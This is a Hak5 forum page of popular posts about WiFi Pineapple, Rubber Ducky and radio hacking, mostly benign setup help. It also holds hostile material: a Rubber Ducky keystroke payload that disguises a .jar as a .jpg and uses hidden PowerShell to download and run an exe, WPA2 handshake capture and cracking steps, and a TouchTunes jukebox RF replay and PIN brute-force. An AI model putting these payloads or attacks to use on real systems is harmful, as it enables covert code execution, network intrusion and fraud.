Leaderboard


Popular Content

Showing content with the highest reputation since 01/20/2017 in all areas

  1. 8 points
    I'm soo late to this game but I made a video to describe my feelings about it and help where I can to spread the word: https://www.youtube.com/watch?v=Wggu_qaYJaQ part of http://hackingtogether.org/ We on this list are for the most part already participating in a social group that has support. I'm not saying we don't have problems, but the ones that don't have such support, who aren't part of any groups or whom you only see at a con or two, but don't speak, don't participate in CTFs or other side events, those are the ones (usually) in the most danger of feeling isolated. So, if you know people like that, reach out, invite them to be part of your team, group, or talk. Let us all help to make sure that another life isn't lost for avoidable reasons. There are too few of us as it is.
  2. 4 points
    Then either tell your "friend" to press the button or stop doing illegal things.
  3. 3 points
    Thought some here might get a laugh out of it. If you've ever taken an Offsec course, you'll know this feeling. http://www.captiongenerator.com/320492/Offsec-Student-Admins
  4. 3 points
    When I do physical assessments that have WPA/2 enabled wireless networks I would like to have the ability to walk around the facility with a pineapple in my backpack and have it constantly trying to get a handshake in a reliable way. Here are a few requirement requests:
      1. Stability is key. I might only get one walk through to get it done.
      2. Needs to support more than one WPA ESSID (name). If I am targeting a building and they have Employee and Guest networks I need to be able to get both in one go. See #1.
      3. Ability to automatically verify the handshake is valid via Aircrack or other tool.
      4. Remove WPA ESSID automatically from the rotation if a valid handshake is captured.
      5. Shutdown the pineapple if all captured (save battery), optional setting.
      6. Constantly be re-scanning the area for the best AP to target. (If "BOBWIFI" is no longer in range it shouldn't attack it again.)
      7. Always target the AP with the best signal if possible.
      8. Prioritize APs with clients if possible.
      9. Have an auto-on with loaded AP names so I can just plug in the Pineapple when it's go time and not have to configure anything post-boot.
      10. Have the ability to auto-add APs in the area to a "temp" list while keeping a "target" list.
      11. List of APs with captured/verified handshakes for easy download of the cap file.
      12. Use both wifi cards if possible for 5GHz (TETRA) as well as 2GHz.
      13. Try a few ways to get the handshake, I know there are a few techniques out there but I don't recall them all.
    Thoughts?
  5. 2 points
  6. 2 points
    Hi Roatandave, I just wanted to chime in on this module and give some guidance. First of all, I would suggest taking a look at the Let's Code we did about a year ago. It will provide you with enough information to properly format and develop your module. Taking a look at the GitHub link you provided, I noticed that the module.html is formatted incorrectly, and there is no module.info file. There are also duplicate and .pyc files in your Ajaxterm_files folder, which you may want to clean up. I would also like to talk about security a bit. While ajaxterm does seem to authenticate the user, there is no encryption or much regard given to security. This would somehow need to be resolved before we would be able to publish this module in our repository. I am sure this is possible, but it may actually be easier to re-write the terminal emulator from the ground up and let it interface directly with the WiFi Pineapple's module API.
  7. 2 points
    Sorry Foxtrot I forgot to say, I am not building a regular module. I am trying to get a terminal app to pass the command line to the dashboard without having to go through ssh. Just to go in and make quick changes.
  8. 2 points
    I apologize to all for my comments above. It was just a lack of sleep and frustration. I thank all of you for your interest and for correcting me. Yes, it starts its own port at localhost:8022 and broadcasts its own ajaxterm.html. The iframe in module.html is directed to this port and displays the terminal. In the Ajaxterm_files directory is ajaxterm.py which starts the terminal. The help that I need is putting a start/stop button in the module.html to enable and disable the terminal. Here is the link to my github. Edit: After days of searching and trying many terminal apps, I chose this one for its size and it works in the Nano https://github.com/Roatandave/Nano-Terminal
  9. 2 points
  10. 2 points
    Open Command Prompt (Start Menu > type 'cmd' > Press enter).
    Type "assoc .bin= " (without the quotation marks, note the space after the equals sign).
    This will un(assoc)iate the .bin files from being opened with any program. You can then associate it with whatever you would like.
  11. 2 points
    Make sure the first line of your script reads:
        #!/bin/sh /etc/rc.common
    Copy your script to the /etc/init.d/ directory.
    Make sure the execute bit is on:
        chmod +x /etc/init.d/<your script>
    Enable your script:
        /etc/init.d/<your script> enable
    Your script should now have a symlink in /etc/rc.d/:
        ls -lh /etc/rc.d | grep <your script>
    Confirm your init script is enabled:
        /etc/init.d/<your script> enabled && echo on
    If this command returns on, then you're all set. If this command doesn't return anything, then your script isn't enabled. Here you will find more information about booting: http://wiki.openwrt.org/doc/techref/process.boot
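    For reference, here is an added example (written for this thread, not code from the post above or from the OpenWRT project) of what such an init script looks like, together with a small preflight check that tests the same things the steps above check: the "#!/bin/sh /etc/rc.common" first line, the execute bit, the presence of start() and stop(), and the S<START><name> symlink that "enable" creates in /etc/rc.d. The service name "mysensor" and the command it runs are placeholders; the checker runs on any POSIX shell, so it can be used on a workstation before the script is copied to the device.

```shell
#!/bin/sh
# Added example, not from the forum post or OpenWRT. The service "mysensor"
# and its binary are placeholders for whatever you actually want to run.

# Write an OpenWRT-style init script for a hypothetical service into $1.
write_init_script() {
    target="$1"
    cat > "$target" <<'EOF'
#!/bin/sh /etc/rc.common
# /etc/rc.common supplies start/stop/restart/enable/disable/enabled.
START=99   # ordering of the S99mysensor symlink in /etc/rc.d (late in boot)
STOP=10    # ordering of the K10mysensor symlink (stopped early on shutdown)

start() {
    # placeholder daemon; replace with the real command
    /usr/bin/mysensor --daemon
}

stop() {
    killall mysensor 2>/dev/null
}
EOF
    chmod +x "$target"
}

# Preflight: print "ok" and return 0 when the script satisfies the steps in
# the post (correct first line, executable, defines start and stop);
# otherwise print the first problem found and return 1.
check_init_script() {
    f="$1"
    [ "$(head -n 1 "$f")" = "#!/bin/sh /etc/rc.common" ] || { echo "bad first line"; return 1; }
    [ -x "$f" ] || { echo "execute bit missing"; return 1; }
    grep -q '^start()' "$f" || { echo "no start() function"; return 1; }
    grep -q '^stop()' "$f" || { echo "no stop() function"; return 1; }
    echo "ok"
    return 0
}

# The symlink that "/etc/init.d/<script> enable" creates in /etc/rc.d:
# S followed by the START= value and the script name. This is what the
# "ls -lh /etc/rc.d | grep <your script>" step should show.
expected_rc_link() {
    f="$1"
    start=$(sed -n 's/^START=\([0-9]*\).*/\1/p' "$f" | head -n 1)
    echo "/etc/rc.d/S${start}$(basename "$f")"
}

# Stand-alone usage: build the script in a temp dir and check it.
if [ "${1:-}" = "--demo" ]; then
    dir=$(mktemp -d)
    write_init_script "$dir/mysensor"
    check_init_script "$dir/mysensor"
    expected_rc_link "$dir/mysensor"
    rm -rf "$dir"
fi
```

    Run it with "sh initcheck.sh --demo" to see the check pass and the expected symlink name; point check_init_script at your own file to catch a missing execute bit or a wrong shebang before you copy it to /etc/init.d/.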
  12. 2 points
    Great! Cabinet module worked like a charm! Thanks. Here are the API call parameters:
        module: Cabinet
        action: deleteFile
        file: /etc/pineapple/profiling_data
    Cheers.
  13. 2 points
    Hey Null Trace, you can have it running in the background if you install screen. You can install it with: opkg install screen and then, when you ssh in, run screen first by typing 'screen', then run the commands, and before disconnecting hit CTRL-A and then D. To retrieve your screen session type 'screen -r'; if you have more than one screen instance it will list them and you will need to type 'screen -r 4322', for example. If you want to close a screen instance, retrieve it as above and type 'exit'. As for running DWall etc., I'm not sure if it will work alongside, sorry :) Hope this helps.
  14. 2 points
    The TP-Link wn722n is pretty good all-round https://www.amazon.co.uk/TP-LINK-TL-WN722N-Mbps-Wireless-Adapter/dp/B002SZEOLG I haven't heard of anyone having issues with it in Windows 10.
  15. 2 points
    I'd agree with getting it in writing to say what you are allowed to do and what is out of scope. I'd also make sure you stress that whatever you do, you are identifying issues, not proving issues don't exist. Another way to put it, if you find 2 issues from your testing you should write: I found two issues on our network, there might be more. Not: We have two issues on our network. It is a subtle difference but with the second, if they fix those two issues they will go away thinking they are done and secure, with the first, you are covering yourself from anything you missed. I'd also be careful with your terminology, a vulnerability assessment looks for issues, a penetration test then exploits them to see where you can get. Without skills, you are probably going to be able to identify vulnerabilities but unlikely to be able to properly exploit things without the potential for things going wrong (i.e. running Metasploit exploits against the domain controller is bad). Drop the word hacking completely. If you have any systems hosted on cloud platforms, make sure you have full permission of the hosting company, some care, some don't, some see it as you are paying so you control it, some will come after you. If you are going to scan your exterior across the internet then be careful where you scan from, some ISPs don't like to see scanning traffic leaving their networks. Again, talk to them and get something in writing.
  16. 2 points
    Update: I've successfully built hostapd version 2.6 with the MANA patches for OpenWRT. SensePost has not merged this version with the "release" version, but I feel like everything is stable enough to be pushed out. So I'm going to update my GitHub repo and packages ASAP. If you find any bugs, I'd be very happy if you could report them to me. PS. When running version 2.6, I'd be very very interested in people's experiences with the "taxonomy" feature within hostapd. It's a feature that identifies the client device based on information stored within the probe and association packets being sent. I got this to work on my Linux version (PC), and I'd be very interested if we got this to work together with the MANA patches for OpenWRT. You would then be able to identify devices around you, based on their MAC address. For example: (Nexus 5, or iPhone 6s, etc.) PSS. Still working on a Pineapple Module. This turned out more time consuming than I had expected. But it's in progress.. :) Yours truly, Zylla / Andreas
  17. 2 points
    Take the micro SD card out of the ducky and use the small keychain micro SD card reader; that will allow you to create and deploy your own payloads. You cannot access the inject.bin file on the SD card while it is plugged into the rubber ducky.
  18. 2 points
    I feel with the recent amount of forum posts about shop questions, we should probably have a sticky about the shop, and also an added message on forum signup. If you only signup to post about shop questions, a quick message in the signup process might help streamline pointing them to shop@hak5.org Also a small maybe 5 to 10 FAQ and answers in the sticky post about shop issues might also be a good resource for people who seem to always come to the forums for help with purchases, even though this is probably not where we'd want them gathering, it's inevitable they will always post here at some point. Being able to give a link to the sticky post about shop issues in the forum signup like our read first sticky posts would make a good addition.
  19. 2 points
    The only thing you need to do is this: root@Pineapple:~# wget -qO- https://raw.githubusercontent.com/adde88/hostapd-mana/master/INSTALL.sh | bash -s -- -v -v The install script detects the pineapple nano, and takes care of sym-linking the directory itself. It should be done before installing the packages. Also, if you were to copy the commands that you specified above (wget, Bash, Ln), it would fail. It should be run in lowercase letters, no capital letters anywhere. There's also an error with the operators you supply to bash. So please, when installing, copy the command I showed you above. It's the only thing you should need to do. Also, I need to stress this again: This is not for the faint of heart! Don't try installing this, and using this if you're not familiar with OpenWRT, SSH, and Linux systems. You could potentially screw something up if you don't know what you're doing. I'm working on a module that will make all this a lot easier and user-friendly for everyone, and I'm hoping to have it ready soon.
  20. 1 point
    You most likely got RP-SMA antennas as they are easy to find. The Tetra uses SMA antennas. The Tetra came with 5 dBi antennas. Watch these and know that the Tetra with the 5 dBi antenna already puts out 29 dBm and you really don't wanna go over that. 30 dBm is max for US. At the most you might be able to get a 6 dBi SMA antenna.
  21. 1 point
    Thank you for looking, I found this program on the net and is only a starting point, an idea and yes it is a mess right now. I am not a programmer or a developer, just an old fart with some time to kill and enjoying the mental exercise.
  22. 1 point
    I use it for PineAP when I just want to plug in the nano to the battery and collect SSIDs and logs. It lets me know that wlan1 is in monitor mode and PineAP is running. Or I turn it off if I have it out, that way it doesn't draw attention. Also I noticed that there are solder points for 3 more LEDs next to the green one. No LED, just the solder points.
  23. 1 point
    So. I have made some huge progress... 5.8 GHz has been 100% stable (long range) for about 5 days now... no packet loss, no more disconnects... 2.4 is too crowded... it was all packet loss/retry/drop/retry. I see 60 Mbps during good conditions but 40 Mbps is consistent... I ordered some SMA pigtails, digital calipers and will build some antennas tuned for 5.8 GHz...
  24. 1 point
    Everything on the store can be found here I can't see the mug though, it must be gone :(
  25. 1 point
    How did you set up WP6.sh? I used Manual over Automatic because the automatic messed some things up. Normally your gateway is like 192.168.0.1, 10.0.0.1, 172.16.42.1, unless you set that IP as your gateway through your router. If you're unsure if it's the pineapple, then plug it in and run an ifconfig when the blue light goes solid, and go to the browser and just type in 172.16.42.1:1471 and see where you get from there. You won't have ICS but you can see if it's the pineapple or just your settings through wp6.sh
  26. 1 point
    BTW, I know you think the problem is 'bin opening in notepad', but the question is more what are you trying to do with a bin file in Windows causing it to open in Notepad; what are you expecting to accomplish? The last time I associated .bin in Windows was so my CD burning app opened it to write it to a CD.
  27. 1 point
    If you use correct spelling instead of abbreviations, other people can translate and read too. Google doesn't know what to do with aki vcs tb bj q eh né. But welcome to the site! _________________________________________________ If you guys would use correct spelling we can translate and read your posts. Google doesn't handle chat abbreviations very well. And welcome to the site!
  28. 1 point
    Thank you! You've made my head spin with all this information. I'm sure I'll come up with some questions soon.
  29. 1 point
    This is what I did on a fresh install of kali rolling and it worked fine for me. curl -s https://raw.githubusercontent.com/nu11secur1ty/pulseaudio/master/pulseaudio.sh | bash
  30. 1 point
    I appreciate the advice everyone. I've asked for a sit down with my Director to go over some of these and come up with a good plan. This is a great community, you guys are awesome!
  31. 1 point
  32. 1 point
    One thing I'd add to the list, document EVERYTHING. All commands from top to bottom that got you those results, and make sure it can be reproducible to the extent that anyone reading your report and documentation can make it happen without your help. This way once things get patched, they can test the results from your report.
  33. 1 point
    V0.4 has been released! https://github.com/notpike/The-Fonz
    TX all commands as you would with the remote! Passive PIN discovery! Brute force a command, loops through all 256 PINs for a single command! Dank ass memes! Booze, Chicks/Dudes and more!
    No practical application, but here's a script that uses the YSO (or any other CC1111 radio that uses RfCat) to emulate, brute force, and listen for the TouchTunes Jukebox remote transmissions. With this power you could skip songs, turn up/down the volume, or possibly add promotion credits for free songs. For research purposes only of course :D.
    -=Here's the quick and dirty on how I reversed this remote=-
    So… This project all started 2 years ago when my wife and I dropped $20 at the local gay bar to listen to some filthy Dubstep, rad ass EDM, and Beck. After inserting that Jackson, I realized my grand idea of saving money isn't working out… (We spent $120 that night… $40 on the jukebox…) Next morning, hung over and sad, I made it my mission to figure out how to get free music out of this Jukebox. This is how I started, and here's how I bumbled my way to figuring out an IoT Jukebox known as TouchTunes.
    -=Reading=-
    I would just say research but TBH what I did wasn't that sexy. Armed with my skill of "Google Fu" I found various manuals about the device. I found some good information in these manuals and it gave me a few ideas on how to score free jams.
    http://productwarranty.touchtunes.com/download/attachments/655383/900475-001-Virtuo Installation and Setup Guide-Rev08.pdf?api=v2
    http://productwarranty.touchtunes.com/download/attachments/1572899/900203-002-Dashboard User Guide-Rev00.pdf?version=1
    http://www.touchtunes.com/media/marketing_resources/Remote_Control_Users_Guide_1.pdf
    -=I called random strangers and sat at a bar=-
    I made a few phone calls to random TouchTunes Techs who specialize in repairing these devices and got a lot of good info from them. I learned it was a Linux box, everything is encrypted, it costs money to own the key, everything is locked down, and you need to own ~10 of them to get true admin rights. I wanted a way to experiment with a VM of the OS to figure out how it ticked. Because I don't have $5000 laying around I'm kinda forced to black box this device. Thanks to a few local bars who had their IoT Jukebox on the public WiFi, I was able to take a quick gander. Sadly the techs were right… It's locked down... I'll revisit this approach later when I can save up for my own personal Jukebox lol. You can also add credits via the Internet BTW. Try to see if there's a way to make the Jukebox believe I'm god and make it sing and dance.
    -=Three things I learned=-
    1.) You can fill the queue with music to play without paying for it. This was a marketing plan to make people more committed to pay for music if they made a queue first.
    2.) If configured, the jukebox can be set up to receive "promotional credit". Bartenders and/or managers can add to the balance so more music could be played. This is added by pressing the 'P1' button on the wireless remote…
    3.) There is a wireless remote! It transmits on 433.92 MHz and it can be found for $50 on eBay!
    -=My plan of attack=-
    Add music to the queue. Add promotion points. Get free music!
    -=I spent money=-
    Because I'm cheap, I picked up an after-market remote that works with all TouchTunes Jukeboxes Gen 2 and above. The plan was to reverse this remote with my Yard Stick One and HackRF and try to figure out how it works. The remote only has 256 PIN possibilities to keep neighboring bars from walking on each other, so I could just hand jam all 256 PINs (000-255) to figure out which one they are using. 9 times out of 10, it was 000. So yah, nothing complex here.
    -=Reversing… Kinda…=-
    The first thing I did was find the FCC data; not a lot of useful info here but I at least figured out it existed. https://fccid.io/2AHXI-T1
    I used a HackRF with 'osmocom_fft' to monitor and record the wireless remote's transmissions. I then took a look at the raw IQ data with 'inspectrum' to see what I was dealing with. Below is what the On/Off command looks like with a 000 PIN. With this I know I'm working with ASK/OOK. The message in raw binary is...
    1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1,
    In hex it would be... FFFF00A2888A2AAAA8888AA2AA2220
    I found this by right clicking and adding an 'Amplitude Plot' in 'inspectrum', moved the bar over the transmission, added a 'Threshold Plot', clicked 'Enable cursors' to count out how many symbols are being used (also tells you the Symbol Rate) and then right clicked to 'Extract Symbols' and the values were output in the terminal.
    -=RfCat=-
    At this point I switched from using an SDR to RfCat and the YSO. After figuring out the preamble was 1111111111111111 or FFFF in hex, Modulation (ASK/OOK), and symbol rate (~1766) I was able to create a script based off Michael Ossmann's work to help me record the data. https://github.com/mossmann/stealthlock/blob/master/sl.py
    After a lot of beer and recording every PIN possibility for the On/Off a few patterns emerged. If you want to look through all my data you can check out the pastebin below, but here's what I believe is how the transmission is formatted.
    ==Preamble==      ==Key==   ==Message==     ==?==
    ffff00a2888a2     aaaa      8888aa2aa22     20
    I still have no idea what the last 2 hex values are about. (I noticed that there were 2 possible messages for each command depending on what the PIN was. The last 2 were either 02 or 88... I couldn't figure out the pattern so I just hard coded which command was used vs the other depending on the PIN in my final script.)
    -=After that=-
    I expanded the original script I used to record all the transmissions of the remote and added a passive PIN discovery feature to it. I then recorded all the messages (all the buttons) the remote would send (both possibilities) and added the ability to determine which command was used. A week later I figured out how to TX the decoded values and I made a working TouchTunes remote for the YSO. And it's been tested. :D
    http://pastebin.com/Ue7UYAPg
    http://www.pressonproducts.com/t1-jukebox-remote-touchtunes-compatible/
  34. 1 point
    I just wanna give you guys a heads-up that you can edit the hostapd config file to activate ACS (Automatic Channel Survey), which surveys for the best channel to use. Just set the channel to 0 to activate it. Also: You can use 5GHz channels if you are using the Pineapple Tetra. Or you could use both 2.4 and 5GHz at the same time (wlan0 + wlan1), to cover both spectrums. ;)
  35. 1 point
    Sort of, the file() function in PHP returns an array of lines from the file.
        $lines = file($ssidFile);
    This allows us to access each line of the file individually by using its index, which would be n-1 where n is the line number you want.
        // Echo line 1
        echo $lines[0];
        // Echo line 2
        echo $lines[1];
    So to get the number of lines in the file we can use the count() function to count the number of elements in the array.
        echo count($lines);
    In this particular case the SSID file contains one SSID per line. So the number of lines in the file is equal to the number of SSIDs. I think Noth may have confused the principle of zero indexing an array with getting its number of elements, which is why they subtracted one from the count.
  36. 1 point
    I recently got a Mark V which would no longer work if powered by the DC plug but would work fine if powered via USB. Long story short, somehow the previous owner blew out the Step-Down Converter and I managed to fix it, by replacing the chip. Anyone else managed to fry their pineapples? Full story here: https://madgyver.de/en/2017/01/23/wifi-pineapple-mark-v-repair/ This is the chip that was fried: http://aitendo3.sakura.ne.jp/aitendo_data/product_img/power/DC-DC/DC12-5V/FR9888.pdf
  37. 1 point
    You could dual boot Kali using the rEFInd bootloader. That way you're not using a VM with low RAM.
  38. 1 point
    Sorry, forgot to insert a picture of the sucker. BTW, is there no edit button?
  39. 1 point
    UAC RUBBER DUCKY ENCODER AND GENERATOR NOW IN PYTHON 3 I would like to begin by giving a shout out to Skiddie, the original creator of the UAC-ducky generator implemented in Python 2. I used his work in order to re-write the script so it now works for Python 3. I have tested the script and it works for options 1 and 2 perfectly. Options 3 and 4 work, but I have no way of testing whether they work on a rubber ducky because I no longer have access to a rubber ducky. For those who have the rubber ducky, feel free to test options 3 and 4. You can find a video on how the offline mode works at Skiddie's YouTube channel https://www.youtube.com/watch?v=X1uS0ELBJvI For the original UAC-Ducky generator produced by Skiddie check out https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky/blob/master/uac-duck.py You can also find a write up on how it works as well as demo videos. For the one written in Python 3 you can find it here: https://github.com/EgbieAndersonUku1/rubber_ducky/blob/master/rubber_ducky_UAC_3.0.py
  40. 1 point
    Well, I think I may buy this one. I watched a video on Tech TV on YouTube and this was the one they were using. -- http://www.gearbest.com/tv-box-mini-pc/pp_188367.html -- So with these could I get an adapter so I could unhook my 4 bay TV antenna from the TV and hook it to this to receive radio signals?
  41. 1 point
    You can still do some fun stuff with that last RTL you posted. It has the same chipset as the RTL with the TCXO but the oscillator isn't as nice. Personally I would get the one with the TCXO because they're more forgiving to work with. You can tune it by adjusting for the frequency offset but I prefer one less thing to fight. Also if you decided to do more low power small bandwidth monitoring (GPS for example) you would have a hard time with the cheaper RTL. If you're running Windows I would recommend getting VirtualBox and downloading both Kali with the SDR meta package and GNU Radio Live. They both come with a lot of useful tools. https://www.kali.org/news/kali-linux-metapackages/ http://gnuradio.org/redmine/projects/gnuradio/wiki/GNURadioLiveDVD Also I would recommend watching these to learn more about SDR. A lot of the examples you can do with the RTL. https://greatscottgadgets.com/sdr/
  42. 1 point
    I think a shop sticky would be a wonderful idea. Once my own side is up and running again, having two might be a good idea. One for the main store, one for the EU one. Could solve a lot of issues overall with a quick FAQ in it. And while both the Hakshop and my own have FAQs, you'd be surprised how often having one in a forum clears things up also.
  43. 1 point
    google "writing shellcode" for videos and tuts.
  44. 1 point
    Nice article that explains the process and execution: https://www.bettercap.org/blog/sslstripping-and-hsts-bypass
  45. 1 point
    You can make a wireless AP on your Nexus 5 and use the 3rd radio to connect to it and then control the pineapple wirelessly.
  46. 1 point
    Another source: https://wiki.skullsecurity.org/index.php?title=Passwords and KoreLogic's site I think has some along with rules. They have run the Crack Me If You Can comps. This looks good too: http://www.netmux.com/blog/cracking-12-character-above-passwords
  47. 1 point
    Usually this issue happens when an SD card is corrupted in some way. Most operating systems tend to be a little more lenient when it comes to these errors, but the Pineapple gets confused sometimes. I have been able to fix this issue with the following steps:
    Completely wipe the SD card with dd if=/dev/zero of=/dev/sdcard/sd bs=4096
    Eject the SD card from the WiFi Pineapple NANO
    Power off the WiFi Pineapple NANO
    Insert the SD card into the WiFi Pineapple NANO
    Power on the WiFi Pineapple NANO
    Use the web interface to format the SD card (this may take a while). Alternatively, use a Linux distro to format the SD card ext4.
    The card should mount automatically. If it does not, reboot the WiFi Pineapple NANO.
  48. 1 point
    Hi Guys, Hola Chicos. Without long introductions, I'm a big fan of Rubber Ducky, BadUSB techniques, Automation stuff, etc.. A long time ago I was working hard to get the ideal cross-platform payload which works: 1. Cross-OSes 2. Cross-keyboard layouts (not all of them currently) As we all know, in the rubber ducky dual mode (Keyboard + Mass storage) we can't *that easily* get the drive letter dynamically, and all you have to do is execute this command line: for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d This command line loops through the current drive letters and finds the one which has the name "DUCKY", then assigns the variable "duck" to its drive letter; after that the %duck% variable will always be pointing to the USB Rubber Ducky drive letter. Cool! Simulating and writing this command line on some OS keyboard layouts is a big HEADACHE. Writing (', |, ", ^, etc..) is an Ughhhh, a big mess. I wished that USB Rubber Ducky had copy-paste from any source, but what can we do, it is a keyboard and we are functionally limited here! Spanish guys know about the big headache of pressing the "AltGr" key to get some symbols like @#^ and the only way to simulate this is by modifying the kb layout and adding some ASCII codes and stuff, then rewriting the ducky script etc.. So this topic is for you guys to jump over it. Cheers! 
The Windows part (Win 8.1 Eng & Win 7 Esp) So i came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 English UI/Kb Layout and Windows 7 Español UI/Kb Layout and for an extra fun I added some codes to achieve the same on macOS Sierra (a cool way to execute something from Ducky mass storage without the headache of the drive letter and later i will explain why), Here we go: DEFAULT_DELAY 75 DELAY 1000 WINDOWS r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING for %p in DELAY 10 SHIFT 8 STRING A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z DELAY 10 SHIFT 9 DELAY 100 STRING do %p DELAY 10 SHIFT . SHIFT 7 STRING r.bat ENTER DELAY 100 STRING for %p in DELAY 100 STRING (A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z) DELAY 100 STRING do %p:/r.bat ENTER You guys don't need me for sure to explain each step but i will only explain the highlights: 1. I'm looping (in a hard coded way) all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want) 2. 
The loop mentioned above is executed twice, First on a Spanish (latin) keyboard layout and you can notice that when i used the "SHIFT 8" key combinations to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line: for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat So, a "for" loop to execute a bat file and this loop will be executed twice (one time for english kb layout and the other is for the spanish kb layout) You can put anything inside this symbiansymoh.bat file but for satisfying your curiosity guys here's my content: @echo off color 10 REM Getting our drive letter which have the name SYMB assign to symb for /f %%d in ('wmic volume get driveletter^, label ^| findstr "SYMB"')do set symb=%%d REM Copy a NOTmalicious file to the temp folder copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y REM Executing the NOTmalicious file start %tmp%\NOTmalicious.jar REM Downloading and executing another NOTmalicious file powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe" REM Goodbye exit It doesn't matter now what language the machine you're executing the bat file on. 
    The macOS part (English KB Layout) The macOS part is the best and kind of a no-brainer here. As you may know, Linux, Unix and Linux/Unix-like OSes use and identify USB storage by its NAME, not LETTER (there's nothing called letters in this beautiful and lovely world). So sending the key combinations to fire the Spotlight search, then opening the terminal, is so freaking easy; then navigating to "/Volumes/[DRIVE_NAME]/", giving the bash file "symbiansymoh.sh" the execute privileges (chmod +X), then executing it, which also does ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste DEFAULT_DELAY 75 DELAY 1000 GUI SPACE DELAY 500 STRING terminal DELAY 100 ENTER DELAY 500 STRING chmod +X /Volumes/SYMB/symbiansymoh.sh ENTER DELAY 100 STRING nohup sh /Volumes/SYMB/symbioansymoh.sh &>/dev/null & ENTER DELAY 100 GUI q DELAY 300 ENTER And again for feeding your curiosity, here's the content of my symbiansymoh.sh file: #!/bin/bash rm -r /tmp/NOTmalicious.app; cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app; open /tmp/NOTmalicious.app; That copies a stored NOTmalicious.app file to the temp folder, then executes it. Here's a PoC video that demonstrates the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI The topic is open to discussion. Any ideas or modifications are always welcome! Cheers and have a great weekend guys!
  49. 1 point
    Hello Dez, I have some experience with this on Kali. For cracking WPA2 you will need to have some good CPU or GPU power... Let me explain a little bit about hacking WPA2 as far as my experience reaches. First you need to set your WLAN card to promiscuous mode (airmon-ng command). Then you will need to capture the handshake (airodump-ng command). This could take some time; to capture it faster you could disassociate current clients so they reassociate and you capture their handshake (aireplay-ng command). Once captured, you can crack it with a bruteforce or dictionary (aircrack-ng command). However, the pineapple has too little power to do this; I would recommend creating a custom dictionary on a Kali machine, importing the airodump file to the Kali machine and running a dictionary attack. If that won't work you could try a brute force; however, as the minimum password length for WPA2 is 8 chars, it could take at least a couple of days. If you try to crack a 9 char password and they use special chars or numbers, forget it, this will take too long. My advice is to first install Kali on a laptop, do the above commands, and once you master it, use the nano to capture a handshake and crack it on the laptop/server. If you need any additional info, please let me know :)
  50. 1 point